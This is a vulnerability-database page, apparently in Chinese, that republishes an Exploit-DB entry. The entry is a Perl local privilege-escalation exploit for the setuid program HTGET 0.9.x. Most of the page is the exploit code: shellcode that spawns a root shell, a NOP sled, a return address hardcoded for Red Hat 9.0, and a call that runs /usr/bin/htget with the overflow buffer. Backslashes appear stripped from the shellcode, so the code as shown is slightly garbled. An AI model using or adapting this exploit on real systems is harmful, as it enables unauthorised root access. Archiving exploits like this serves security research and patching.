HTGET 0.9.x – Local Privilege Escalation-安全小百科

HTGET 0.9.x – Local Privilege Escalation

漏洞ID	1054851	漏洞类型
发布时间	2005-01-05	更新时间	2005-01-05
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/741

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#!/usr/bin/perl
#^^^^^^^^^^^^^^^^....,,,,|:::::::____******
#HTGET <= 0.9.x local lame r00t exploit	    *	
#written by nekd0 of Unl0ck Research Team    *
#(c) .unl0ck research team 2004-2005. 	     *
#	http://unl0ck.void.ru		    *	
#................/^^^^''''|:::::::----******

$shellcode = 
"x31xc0x31xdbxb0x17xcdx80".
"xb0x2excdx80xebx15x5bx31".
"xc0x88x43x07x89x5bx08x89".
"x43x0cx8dx4bx08x31xd2xb0".
"x0bxcdx80xe8xe6xffxffxff".
"/bin/sh";

$len = 288;
$ret = 0xbfffd62a; #red hat 9.0 
$nop = "x90";
$offset = 0 ;
$vulnprog="/usr/bin/htget";

if (@ARGV == 1) {
    $offset = $ARGV[0];}

if (!-u($vulnprog)){print "$vulnprog is not suid... exitingn";exit();}

for ($i=0; $i<($len-length($shellcode)-100);$i++)
	{$buffer .= $nop;}

$buffer .= $shellcode;

print ("Address: 0x",sprintf('%lx',($ret+$offset)),"n");

$new_ret = pack('l',($ret + $offset));

for ($i+=length($shellcode); $i<$len; $i+=4)
	{$buffer .=$new_ret}

exec("$vulnprog $buffer");

# milw0rm.com [2005-01-05]

相关推荐: Microsoft Windows RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability

Microsoft Windows RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability 漏洞ID 1100421 漏洞类型 Boundary Condition Error 发布时间 200…

文章版权归作者所有，未经允许请勿转载。

THE END